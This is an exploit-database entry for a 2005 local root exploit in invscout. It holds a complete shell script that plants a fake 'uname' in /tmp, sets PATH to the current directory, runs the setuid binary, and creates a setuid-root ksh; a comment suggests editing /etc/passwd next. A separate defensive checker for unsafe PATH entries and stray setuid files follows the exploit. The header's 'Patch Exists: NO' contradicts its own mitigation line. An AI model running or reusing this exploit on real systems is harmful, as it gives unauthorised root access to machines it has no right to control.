vendor: invscout
by: ri0t
CVSS: 7.5 (HIGH)
CWE: invscout bug
Product Name: invscout
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

r00t exploit for invscout bug

This exploit targets the invscout bug reported by iDefense Labs and automates the process of gaining root access through it. The script writes a file named uname in /tmp, sets PATH to ./ and runs /usr/sbin/invscout. The commands in that file copy the ksh binary to /tmp, change its ownership to root:system, and give it execute and setuid permissions. The script then executes the copied shell, which gives the attacker root access. The exploit was coded by ri0t and can be found on www.ri0tnet.net.

Mitigation:

The invscout bug has been fixed in later versions of the software. It is recommended to update to the latest version to mitigate this vulnerability.

Exploit-DB raw data:

#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]
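
A defensive check for the two conditions the script above relies on, a PATH with a relative entry and a setuid file appearing in /tmp. This is an added example, not part of the original page or the exploit author's code; the function names unsafe_path_entries and find_setid_files are hypothetical.

```shell
#!/bin/sh
# Added defensive example; function names are hypothetical.

# Print every PATH entry a privileged program should not search and
# return 1 if any is found. Empty and relative entries ("", ".", "./")
# resolve against the caller's current directory; a world-writable
# directory lets any local user plant a file named after a command.
unsafe_path_entries() {
    _rest="$1:"   # trailing ':' so the loop also sees the last entry
    _bad=0
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        case "$_entry" in
            "") echo "empty entry (means current directory)"; _bad=1 ;;
            /*) # absolute: flag only if other users can write to it
                if [ -d "$_entry" ] &&
                   [ -n "$(find -H "$_entry" -prune -perm -0002 2>/dev/null)" ]; then
                    echo "world-writable: $_entry"; _bad=1
                fi ;;
            *)  echo "relative: $_entry"; _bad=1 ;;
        esac
    done
    return "$_bad"
}

# List setuid/setgid regular files under a directory such as /tmp, the
# kind of artifact the script on this page leaves behind (/tmp/ksh).
find_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Demo on the two PATH values the script on this page sets.
for p in "./" "/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"; do
    echo "PATH=$p"
    unsafe_path_entries "$p" | sed 's/^/  /'
done
```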